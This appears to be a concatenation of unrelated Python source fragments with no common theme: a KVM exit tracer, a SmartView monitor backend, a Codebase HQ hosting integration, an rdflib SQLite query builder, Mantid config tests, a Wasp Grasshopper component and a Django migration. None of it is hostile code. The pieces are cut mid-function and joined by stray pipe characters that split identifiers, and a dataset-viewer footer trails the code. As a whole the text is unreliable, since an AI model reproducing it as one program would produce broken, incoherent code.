"XSAVES",
"XRSTORS",
"N/A",
"N/A",
"UMWAIT",
"TPAUSE"
)
#
# Do some checks
#
try:
# Currently, only adapte on intel architecture
cmd = "cat /proc/cpuinfo | grep vendor_id | head -n 1"
arch_info = subprocess.check_output(cmd, shell=True).strip()
if b"Intel" in arch_info:
pass
else:
raise Exception("Currently we only support Intel architecture, please do expansion if needs more.")
# Check if kvm module is loaded
if os.access("/dev/kvm", os.R_OK | os.W_OK):
pass
else:
raise Exception("Please insmod kvm module to use kvmexit tool.")
except Exception as e:
raise Exception("Failed to do precondition check, due to: %s." % e)
try:
if BPF.support_raw_tracepoint_in_module():
# Let's firstly try raw_tracepoint_in_module
func_entry = "RAW_TRACEPOINT_PROBE(kvm_exit)"
get_er = "ctx->args[0]"
else:
# If raw_tp_in_module is not supported, fall back to regular tp
func_entry = "TRACEPOINT_PROBE(kvm, kvm_exit)"
get_er = "args->exit_reason"
except Exception as e:
raise Exception("Failed to catch kvm exit reasons due to: %s" % e)
def find_tid(tgt_dir, tgt_vcpu):
for tid in os.listdir(tgt_dir):
path = tgt_dir + "/" + tid + "/comm" |
re, clear_current)
return preset
def on_preset_stored(self, *args, **kwargs):
kwargs['backend'] = self
self.emit('on_preset_stored', *args, **kwargs)
def on_preset_active(self, instance, value, **kwargs):
self.emit('on_preset_active', backend=self, preset=instance, value=value)
def on_num_outputs(self, instance, value, **kwargs):
if value == len(self.output_labels):
return
if value != len(self.crosspoints):
self.crosspoints = [0] * value
self.output_labels = [''] * value
def on_num_inputs(self, instance, value, **kwargs):
if value == len(self.input_labels):
return
if value != len(self.crosspoints):
self.crosspoints = [0] * value
self.input_labels = [''] * value
def on_prop_feedback(self, instance, value, **kwargs):
prop = kwargs.get('property')
if prop.name not in self.feedback_prop_map:
return
elock = self.emission_lock(prop.name)
control_prop = self.feedback_prop_map[prop.name]
setattr(self, control_prop, value[:])
def on_prop_control(self, instance, value, **kwargs):
if not self.prelude_parsed or not self.connection_state.is_connected:
return
| prop = kwargs.get('property')
keys = kwargs.get('keys')
if keys is None:
keys = range(len(value))
feedback_prop = '{}s'.format(prop.name.split('_control')[0])
elock = self.emission_lock(feedback_prop)
if elock.held:
return
## | TODO: This is an internal implementation in python-dispatch and
## is subject to future changes.
aio_lock = elock.aio_locks.get(id(self.event_loop))
if aio_lock is not None and aio_lock.locked():
return
if value == getattr(self, feedback_prop):
return
coro_name = '_'.join(['set', feedback_prop])
coro = getattr(self, coro_name)
args = [(key, value[key]) for key in keys]
tx_fut = asyncio.run_coroutine_threadsafe(coro(*args), loop=self.event_loop)
class SmartViewBackendBase(BackendBase):
"""Base class for SmartView devices
Attributes:
num_monitors: Number of physical monitors as reported by the device
inverted: ``True`` if the device has been mounted in an inverted
configuration (to optimize viewing angle).
monitors: A ``list`` containing instances of :class:`SmartViewMonitor`
or :class:`SmartScopeMonitor`, depending on device type.
:Events:
.. function:: on_monitor_property_change(self: SmartViewBackendBase, name: str, value: Any, monitor: SmartViewMonitor = monitor)
Dispatched when any :class:`~pydispatch.properties.Property`
value changes. The event signature for callbacks is
``(smartview_device, property_name, value, **kwargs)`` containing
a keyword argument "monitor" containing the :class:`SmartViewMonitor`
instance.
"""
num_monitors: Optional[int] = Property()
inverted: bool = Property(False)
monitors: List['SmartViewMonitor'] = ListProperty()
monitor_cls: ClassVar[type] = None
device_type: ClassVar[str] = 'smartview'
_events_ = ['on_monitor_property_change']
def __init__(self, **kwargs):
self.bind(monitors=self._on_monitors)
super().__init__(**kwargs)
async def set_monitor_property(self, monitor, name, value):
"""Set a property value for the given :class:`SmartViewMonitor` instance
Arguments:
monitor: The :class:`SmartViewMonitor` instance to set
name (str): Property name
value: The new value to set
This method is a coroutine.
"""
raise NotImplementedError()
def get_monitor_cls(self):
cls = self.monitor_cls
if cls is None:
cls = SmartViewMonitor
return cls
async def add_monitor(self, **kwargs):
cls = self.get_monitor_cls()
kwargs.setdefault('parent', self)
kwargs.setdefault('index', len(self.monitors))
monitor = cls(**kwargs)
monitor.bind(on_property_change=self.on_monitor_prop)
self.monitors.append(monitor)
return monitor
def on_monitor_prop(self, instance, name, value, **kwargs):
kwargs['monitor'] = instance
self.emit('on_monitor_property_change', self, name, value, **kwargs)
def _on_monitors(self, *args, **kwargs):
self.num_monitors = len(self.monitors)
class SmartScopeBackendBase(SmartViewBackendBase):
device_type: ClassVar[str] = 'smartscope'
def get_monitor_cls(self):
cls = self.monitor_cls
if cls is None:
cls = SmartScopeMonitor
return cls
MONITOR_PROPERTY_MAP = {k:k.title() for k in [
'brightness', 'contrast', 'saturation', 'identify', 'border']}
MONITOR_PROPERTY_MAP.update({
'widescreen_sd':'WidescreenSD',
'audio_channel':'AudioChannel',
'scope_mode':'ScopeMode',
})
class SmartViewMonitor(Dispatcher):
"""A single instance of a monitor within a SmartView device
Attributes:
index: Index of the monitor (zero-based)
name: The name of the monitor (can be user-defined)
brightness: The brightness value of the monitor (0-255)
contrast: The contrast value of the monitor (0-255)
saturation: The saturation value of the monitor (0-255)
widescreen_sd: Aspect ratio setting for SD format. Choices can be:
``True`` (stretching enabled), ``False`` (pillar-box), or
``None`` (auto-detect).
identify: If set to ``True``, the monitor's border will be white
for a brief duration to physically locate the device.
border: Sets the border of the monitor to the given color. Choices
are: 'red', 'green', 'blue', 'white', or ``None``.
audio_channel: The audio channel pair (Embedded in the SDI input)
used when :attr:`scope_mode` is set to audio monitoring.
Values are from 0 to 7 (0 == Channels 1&2, etc).
"""
index: int = Property()
name: str = Property()
brightness: int = Property()
contrast: int = Property()
saturation: int = Property()
widescreen_sd: Optional[bool] = Property()
identify: bool = Property(False)
border: Optional[str] = Property()
audio_channel: int = Property()
class PropertyChoices():
widescreen_sd = {
True:'ON',
False:'OFF',
None:'auto',
}
border = {
'red':'red',
'green':'green',
'blue':'blue',
'white':'white',
None:'NONE',
}
identify = {
True:'true',
False:'false',
}
_bind_properties = [
'brightness', 'contrast', 'saturation',
'widescreen_sd', 'identify', 'border', 'audio_channel',
]
_events_ = ['on_property_change']
def __init__(self, **kwargs):
self._property_locks = {}
self.parent = kwargs.get('parent')
self.event_loop = self.parent.event_loop
self.index = kwargs.get('index')
self.name = kwargs.get('name')
props = self.PropertyChoices._bind_properties
for prop in props:
value = kwargs.get(prop)
value = self.get_property_for_choice(prop, value)
setattr(self, prop, value)
self.bind(**{prop:self.on_prop_control for prop in props})
def _get_property_lock(self, name):
lock = self._property_locks.get(name)
if lock is None:
lock = asyncio.Lock()
self._property_locks[name] = lock
return lock
async def set_property_from_backend(self, name, value):
value = self.get_property_for_choice(name, value)
lock = self._get_property_lock(name)
async with lock:
setattr(self, name, value)
self.emit('on_property_change', self, name, value)
async def set_property(self, name, value):
await self.parent.set_monitor_property(se |
if child_nodes:
result = dict([
(child.tagName, self._parse_xml_node(child))
for child in child_nodes
])
else:
result = self.get_xml_text(node.childNodes)
return result
class CodebaseHQ(HostingService):
"""Repository hosting support for Codebase.
Codebase is a repository hosting service that supports Subversion, Git,
and Mercurial. It's available at https://codebasehq.com.
This integration provides repository validation and file fetching. Due to
API limitations, it does not support post-commit review at this time.
"""
name = 'Codebase HQ'
form = CodebaseHQForm
auth_form = CodebaseHQAuthForm
needs_authorization = True
supports_bug_trackers = True
supports_repositories = True
supported_scmtools = ['Git', 'Subversion', 'Mercurial']
repository_fields = {
'Git': {
'path': 'git@codebasehq.com:%(domain)s/'
'%(codebasehq_project_name)s/'
'%(codebasehq_repo_name)s.git',
},
'Subversion': {
'path': 'https://%(domain)s.codebasehq.com/'
'%(codebasehq_project_name)s/'
'%(codebasehq_repo_name)s.svn',
},
'Mercurial': {
'path': 'https://%(domain)s.codebasehq.com/'
'projects/%(codebasehq_project_name)s/repositories/'
'%(codebasehq_repo_name)s/',
},
}
bug_tracker_field = (
'https://%(domain)s.codebasehq.com/projects/'
'%(codebasehq_project_name)s/tickets/%%s'
)
#: A mapping of Codebase SCM types to SCMTool names.
REPO_SCM_TOOL_MAP = {
'git': 'Git',
'svn': 'Subversion',
'hg': 'Mercurial',
}
def __init__(self, *args, **kwargs):
"""Initialize the hosting service.
Args:
*args (tuple):
Positional arguments for the parent constructor.
**kwargs (dict):
Keyword arguments for the parent constructor.
"""
super(CodebaseHQ, self).__init__(*args, **kwargs)
self.client = CodebaseHQClient(self)
def authorize(self, username, password, credentials, *args, **kwargs):
"""Authorize an account for Codebase.
Codebase usees HTTP Basic Auth with an API username (consisting of the
Codebase team's domain and the account username) and an API key (for
the password) for API calls, and a standard username/password for
Subversion repository acce | ss. We need to store all of this.
Args:
username (unicode):
The username to authorize.
password (unicode):
The API token used as a password.
| credentials (dict):
Additional credentials from the authentication form.
*args (tuple):
Extra unused positional arguments.
**kwargs (dict):
Extra unused keyword arguments.
Raises:
reviewboard.hostingsvcs.errors.AuthorizationError:
The credentials provided were not valid.
"""
self.account.data.update({
'domain': credentials['domain'],
'api_key': encrypt_password(credentials['api_key']),
'password': encrypt_password(password),
})
# Test the account to make sure the credentials are fine. Note that
# we can only really sanity-check the API token, domain, and username
# from here. There's no way good way to check the actual password,
# which we only use for Subversion repositories.
#
# This will raise a suitable error message if authorization fails.
try:
self.client.api_get_public_keys(username)
except AuthorizationError:
raise AuthorizationError(
ugettext('One or more of the credentials provided were not '
'accepted by Codebase.'))
self.account.save()
def is_authorized(self):
"""Return if the account has been authorized.
This checks if all the modern authentication details are stored along
with the account.
Returns:
bool:
``True`` if all required credentials are set for the account.
"""
return (self.account.data.get('api_key') is not None and
self.account.data.get('password') is not None and
self.account.data.get('domain') is not None)
def get_password(self):
"""Return the password for this account.
This is used primarily for Subversion repositories, so that direct
access can be performed in order to fetch properties and other
information.
This does not return the API key.
Returns:
unicode:
The account password for repository access.
"""
return decrypt_password(self.account.data['password'])
def check_repository(self, codebasehq_project_name=None,
codebasehq_repo_name=None, tool_name=None,
*args, **kwargs):
"""Check the validity of a repository.
This will perform an API request against Codebase to get information on
the repository. This will throw an exception if the repository was not
found, and return cleanly if it was found.
Args:
codebase_project_name (unicode):
The name of the project on Codebase.
codebasehq_repo_name (unicode):
The name of the repository on Codebase.
tool_name (unicode):
The name of the SCMTool for the repository.
*args (tuple):
Extra unused positional arguments passed to this function.
**kwargs (dict):
Extra unused keyword arguments passed to this function.
Raises:
reviewboard.hostingsvcs.errors.RepositoryError:
The repository was not found.
"""
# The form should enforce these values.
assert codebasehq_project_name
assert codebasehq_repo_name
assert tool_name
try:
info = self.client.api_get_repository(codebasehq_project_name,
codebasehq_repo_name)
except HostingServiceAPIError as e:
logging.error('Error finding Codebase repository "%s" for '
'project "%s": %s',
codebasehq_repo_name, codebasehq_project_name,
e)
raise RepositoryError(
ugettext('A repository with this name and project was '
'not found.'))
try:
scm_type = info['repository']['scm']
except KeyError:
logging.error('Missing "scm" field for Codebase HQ repository '
'payload: %r',
info)
raise RepositoryError(
ugettext('Unable to determine the type of repository '
'from the Codebase API. Please report this.'))
try:
expected_tool_name = self.REPO_SCM_TOOL_MAP[scm_type]
except KeyError:
logging.error('Unexpected "scm" value "%s" for Codebase HQ '
'repository, using payload: %r',
scm_type, info)
raise RepositoryError(
ugettext('Unable to determine the type of repository '
'from the Codebase API. Please report this.'))
if expected_tool_name != tool_name:
raise RepositoryError(
ugettext("The repository type doesn't match what you "
"selected. Did you mean %s?")
% expected_tool_name)
def get_file(self, repository, path, revision, *args, **kwargs):
"""Returns the content of a file in a repository.
This will perform an API request to fetch |
tables for the closed world universe given by the identifier
print "Destroyed Close World Universe %s ( in SQLite database %s)"%(self.identifier,home)
db.commit()
c.close()
db.close()
os.remove(os.path.join(home,self.identifier))
def EscapeQuotes(self,qstr):
"""
Ported from Ft.Lib.DbUtil
"""
if qstr is None:
return ''
tmp = qstr.replace("\\","\\\\")
tmp = tmp.replace('"', '""')
tmp = tmp.replace("'", "\\'")
return tmp
#This is overridden to leave unicode terms as is
#Instead of converting them to ascii (the default behavior)
def normalizeTerm(self,term):
if isinstance(term,(QuotedGraph,Graph)):
return term.identifier
elif isinstance(term,Literal):
return self.EscapeQuotes(term)
elif term is None or isinstance(term,(list,REGEXTerm)):
return term
else:
return term
#Where Clause utility Functions
#The predicate and object clause builders are modified in order to optimize
#subjects and objects utility functions which can take lists as their last argument (object,predicate - respectively)
def buildSubjClause(self,subject,tableName):
if isinstance(subject,REGEXTerm):
return " REGEXP (%s,"+" %s)"%(tableName and '%s.subject'%tableName or 'subject'),[subject]
elif isinstance(subject,list):
clauseStrings=[]
paramStrings = []
for s in subject:
if isinstance(s,REGEXTerm):
clauseStrings.append(" REGEXP (%s,"+" %s)"%(tableName and '%s.subject'%tableName or 'subject') + " %s")
paramStrings.append(self.normalizeTerm(s))
elif isinstance(s,(QuotedGraph,Graph)):
clauseStrings.append("%s="%(tableName and '%s.subject'%tableName or 'subject')+"%s")
paramStrings.append(self.normalizeTerm(s.identifier))
else:
clauseStrings.append("%s="%(tableName and '%s.subject'%tableName or 'subject')+"%s")
paramStrings.append(self.normalizeTerm(s))
return '('+ ' or '.join(clauseStrings) + ')', paramStrings
elif isinstance(subject,(QuotedGraph,Graph)):
return "%s="%(tableName and '%s.subject'%tableName or 'subject')+"%s",[self.normalizeTerm(subject.identifier)]
else:
return subject is not None and "%s="%(tableName and '%s.subject'%tableName or 'subject')+"%s",[subject] or None
#Capable off taking a list of predicates as well (in which case sub clauses are joined with 'OR')
def buildPredClause(self,predicate,tableName):
if isinstance(predicate,REGEXTerm):
return " REGEXP (%s,"+" %s)"%(tableName and '%s.predicate'%tableName or 'predicate'),[predicate]
elif isinstance(predicate,list):
clauseStrings=[]
paramStrings = []
for p in predicate:
if isinstance(p,REGEXTerm):
clauseStrings.append(" REGEXP (%s,"+" %s)"%(tableName and '%s.predicate'%tableName or 'predicate'))
else:
clauseStrings.append("%s="%(tableName and '%s.predicate'%tableName or 'predicate')+"%s")
paramStrings.append(self.normalizeTerm(p))
return '('+ ' or '.join(clauseStrings) + ')', paramStrings
else:
return predicate is not None and "%s="%(tableName and '%s.predicate'%tableName or 'predicate')+"%s",[predicate] or None
#Capable of taking a list of objects as well (in which case sub clauses are joined with 'OR')
def buildObjClause(self,obj,tableName):
if isinstance(obj,REGEXTerm):
return " REGEXP (%s,"+" %s)"%(tableName and '%s.object'%tableName or 'object'),[obj]
elif isinstance(obj,list):
clauseStrings=[]
paramStrings = []
for o in obj:
if isinstance(o,REGEXTerm):
clauseStrings.append(" REGEXP (%s,"+" %s)"%(tableName and '%s.object'%tableName or 'object'))
paramStrings.append(self.normalizeTerm(o))
elif isinstance(o,(QuotedGraph,Graph)):
clauseStrin | gs.append("%s="%(tableName and '%s.object'%tableName or 'object')+"%s")
paramStrings.append(self.normaliz | eTerm(o.identifier))
else:
clauseStrings.append("%s="%(tableName and '%s.object'%tableName or 'object')+"%s")
paramStrings.append(self.normalizeTerm(o))
return '('+ ' or '.join(clauseStrings) + ')', paramStrings
elif isinstance(obj,(QuotedGraph,Graph)):
return "%s="%(tableName and '%s.object'%tableName or 'object')+"%s",[self.normalizeTerm(obj.identifier)]
else:
return obj is not None and "%s="%(tableName and '%s.object'%tableName or 'object')+"%s",[obj] or None
def buildContextClause(self,context,tableName):
context = context is not None and self.normalizeTerm(context.identifier) or context
if isinstance(context,REGEXTerm):
return " REGEXP (%s,"+" %s)"%(tableName and '%s.context'%tableName or 'context'),[context]
else:
return context is not None and "%s="%(tableName and '%s.context'%tableName or 'context')+"%s",[context] or None
def buildTypeMemberClause(self,subject,tableName):
if isinstance(subject,REGEXTerm):
return " REGEXP (%s,"+" %s)"%(tableName and '%s.member'%tableName or 'member'),[subject]
elif isinstance(subject,list):
clauseStrings=[]
paramStrings = []
for s in subject:
clauseStrings.append("%s.member="%tableName+"%s")
if isinstance(s,(QuotedGraph,Graph)):
paramStrings.append(self.normalizeTerm(s.identifier))
else:
paramStrings.append(self.normalizeTerm(s))
return '('+ ' or '.join(clauseStrings) + ')', paramStrings
else:
return subject and u"%s.member = "%(tableName)+"%s",[subject]
def buildTypeClassClause(self,obj,tableName):
if isinstance(obj,REGEXTerm):
return " REGEXP (%s,"+" %s)"%(tableName and '%s.klass'%tableName or 'klass'),[obj]
elif isinstance(obj,list):
clauseStrings=[]
paramStrings = []
for o in obj:
clauseStrings.append("%s.klass="%tableName+"%s")
if isinstance(o,(QuotedGraph,Graph)):
paramStrings.append(self.normalizeTerm(o.identifier))
else:
paramStrings.append(self.normalizeTerm(o))
return '('+ ' or '.join(clauseStrings) + ')', paramStrings
else:
return obj is not None and "%s.klass = "%tableName+"%s",[obj] or None
def triples(self, (subject, predicate, obj), context=None):
"""
A generator over all the triples matching pattern. Pattern can
be any objects for comparing against nodes in the store, for
example, RegExLiteral, Date? DateRange?
quoted table: <id>_quoted_statements
asserted rdf:type table: <id>_type_statements
asserted non rdf:type table: <id>_asserted_statements
triple columns: subject,predicate,object,context,termComb,objLanguage,objDatatype
class membership columns: member,klass,context termComb
FIXME: These union all selects *may* be further optimized by joins
"""
quoted_table="%s_quoted_statements"%self._internedId
asserted_table="%s_asserted_statements"%self._internedId
asserted_type_table="%s_type_statements"%self._internedId
literal_table = "%s_literal_statements"%self._internedId
c=self._db.cursor()
parameters = []
if predicate == RDF.type:
#select from asserted rdf:type partition and quoted table (if a context is specified)
clauseString,params = self.buildClause('typeTable',subject,RDF.type, obj,context,True |
from __future__ import (absolute_import, division, print_function)
import unittest
import os
import testhelpers
from mantid.kernel import (ConfigService, ConfigServiceImpl, config,
std_vector_str, FacilityInfo, InstrumentInfo)
class ConfigServiceTest(unittest.TestCase):
__dirs_to_rm = []
__init_dir_list = ''
def test_singleton_returns_instance_of_ConfigService(self):
self.assertTrue(isinstance(config, ConfigServiceImpl))
def test_getLocalFilename(self):
local = config.getLocalFilename().lower()
self.assertTrue('local' in local)
def test_getUserFilename(self):
user = config.getUserFilename().lower()
self.assertTrue('user' in user)
def test_getFacilityReturns_A_FacilityInfo_Object(self):
facility = config.getFacility()
self.assertTrue(isinstance(facility, FacilityInfo))
def test_getFacility_With_Name_Returns_A_FacilityInfo_Object(self):
facility = config.getFacility("ISIS")
self.assertTrue(isinstance(facility, FacilityInfo))
self.assertRaises(RuntimeError, config.getFacility, "MadeUpFacility")
def test_getFacilities_Returns_A_FacilityInfo_List(self):
facilities = config.getFacilities()
self.assertTrue(isinstance(facilities[0], FacilityInfo))
def test_getFacilities_and_Facility_Names_are_in_sync_and_non_empty(self):
facilities = config.getFacilities()
names = config.getFacilityNames()
self.assertTrue(len(names)>0)
self.assertEquals(len(names),len(facilities))
for i in range(len(names)):
self.assertEquals(names[i],facilities[i].name())
def test_update_and_set_facility(self):
self.assertFalse("TEST" in config.getFacilityNames())
ConfigService.updateFacilities(os.path.join(ConfigService.getInstrumentDirectory(),"IDFs_for_UNIT_TESTING/UnitTestFacilities.xml"))
ConfigService.setFacility("TEST")
self.assertEquals(config.getFacility().name(), "TEST")
self.assertRaises(RuntimeError, config.getFacility, "SNS")
def test_getInstrumentReturns_A_InstrumentInfo_Object(self):
self.assertTrue(isinstance(config.getInstrument("WISH"), InstrumentInfo))
self.assertRaises(RuntimeError, config.getInstrument, "MadeUpInstrument")
def test_service_acts_like_dictionary(self):
test_prop = "algorithms.retained"
self.assertTrue(config.hasProperty(test_prop))
dictcall = config[test_prop]
fncall = config.getString(test_prop)
self.assertEquals(dictcall, fncall)
self.assertNotEqual(config[test_prop], "")
old_value = fncall
config.setString(test_prop, "1")
self.assertEquals(config.getString(test_prop), "1")
config[test_prop] = "2"
self.assertEquals(config.getString(test_prop), "2")
config.setString(test_prop, old_value)
def test_getting_search_paths(self):
"""Retrieve the search paths
"""
paths = config.getDataSearchDirs()
self.assertEquals(type(paths), std_vector_str)
self.assert_(len(paths) > 0)
def test_setting_paths_via_single_string(self):
new_path_list = self._setup_test_areas()
path_str = ';'.join(new_path_list)
config.setDataSearchDirs(path_str)
paths = config.getDataSearchDirs()
# Clean up here do that if the assert fails
# it doesn't bring all the other tests down
self._clean_up_test_areas()
self.assertTrue(len(paths), 2)
self.assertTrue('tmp' in paths[0])
self.assertTrue('tmp_2' in paths[1])
self._clean_up_test_areas()
def test_setting_log_channel_levels(self):
| testhelpers.assertRaisesNothing(self, config.setFileLogLevel, 4)
testhelpers.assertRaisesNothing(self, config.setConsoleLogLevel, 4)
def _setup_test_areas(self):
"""Create a new data search path string
"""
self.__init_dir_list = config['datasearch.directories']
# Set new paths - Make a temporary dir | ectory so that I know where it is
test_path = os.path.join(os.getcwd(), "tmp")
try:
os.mkdir(test_path)
self.__dirs_to_rm.append(test_path)
except OSError:
pass
test_path_two = os.path.join(os.getcwd(), "tmp_2")
try:
os.mkdir(test_path_two)
self.__dirs_to_rm.append(test_path_two)
except OSError:
pass
return [test_path, test_path_two]
def _clean_up_test_areas(self):
config['datasearch.directories'] = self.__init_dir_list
# Remove temp directories
for p in self.__dirs_to_rm:
try:
os.rmdir(p)
except OSError:
pass
if __name__ == '__main__':
unittest.main()
|
# Wasp: Discrete Design with Grasshopper plug-in (GPL) initiated by Andrea Rossi
#
# This file is part of Wasp.
#
# Copyright (c) 2017, Andrea Rossi <a.rossi.andrea@gmail.com>
# Wasp is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published
# by the Free Software Foundation; either version 3 of the License,
# or (at your option) any later version.
#
# Wasp is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Wasp; If not, see <http://www.gnu.org/licenses/>.
#
# @license GPL-3.0 <https://www.gnu.org/licenses/gpl.html>
#
# Significant parts of Wasp have been developed by Andrea Rossi
# as part of research on digital materials and discrete design at:
# DDU Digital Design Unit - Prof. Oliver Tessmann
# Techn | ische Universitt Darmstadt
#########################################################################
## COMPONENT I | NFO ##
#########################################################################
"""
Export Wasp information for DisCo VR software
-
Provided by Wasp 0.5
Args:
NAME: Rule group name. It will be used to activate/deactivate the rules contained in DisCo
GR: Rule grammars to be included in the group
Returns:
RULE_G: Rule Group instance
"""
ghenv.Component.Name = "Wasp_DisCo Rule Group"
ghenv.Component.NickName = 'RuleG'
ghenv.Component.Message = 'v0.5.005'
ghenv.Component.IconDisplayMode = ghenv.Component.IconDisplayMode.application
ghenv.Component.Category = "Wasp"
ghenv.Component.SubCategory = "7 | DisCo VR"
try: ghenv.Component.AdditionalHelpFromDocStrings = "5"
except: pass
import sys
import json
import Rhino.Geometry as rg
import Grasshopper as gh
## add Wasp install directory to system path
wasp_loaded = False
ghcompfolder = gh.Folders.DefaultAssemblyFolder
if ghcompfolder not in sys.path:
sys.path.append(ghcompfolder)
try:
from wasp import __version__
wasp_loaded = True
except:
msg = "Cannot import Wasp. Is the wasp folder available in " + ghcompfolder + "?"
ghenv.Component.AddRuntimeMessage(gh.Kernel.GH_RuntimeMessageLevel.Error, msg)
## if Wasp is installed correctly, load the classes required by the component
if wasp_loaded:
from wasp.disco import DisCoRuleGroup
def main(group_name, rule_grammar):
check_data = True
## check inputs
if group_name is None:
check_data = False
msg = "No group name provided"
ghenv.Component.AddRuntimeMessage(gh.Kernel.GH_RuntimeMessageLevel.Warning, msg)
if len(rule_grammar) == 0:
check_data = False
msg = "No rules grammar provided"
ghenv.Component.AddRuntimeMessage(gh.Kernel.GH_RuntimeMessageLevel.Warning, msg)
if check_data:
return DisCoRuleGroup(group_name, rule_grammar)
else:
return -1
result = main(NAME, GR)
if result != -1:
RULE_G = result |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations
d | ef update_site_forward(apps, schema_editor):
"""Set site domain and name."""
Site = apps.get_model("sites", "Site")
Site.objects.update_or_create(
id=settings.SITE_ID,
defaults={
"domain": "choimirai.com",
"name": "Django Tutorial"
| }
)
def update_site_backward(apps, schema_editor):
"""Revert site domain and name to default."""
Site = apps.get_model("sites", "Site")
Site.objects.update_or_create(
id=settings.SITE_ID,
defaults={
"domain": "example.com",
"name": "example.com"
}
)
class Migration(migrations.Migration):
dependencies = [
('sites', '0001_initial'),
]
operations = [
migrations.RunPython(update_site_forward, update_site_backward),
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.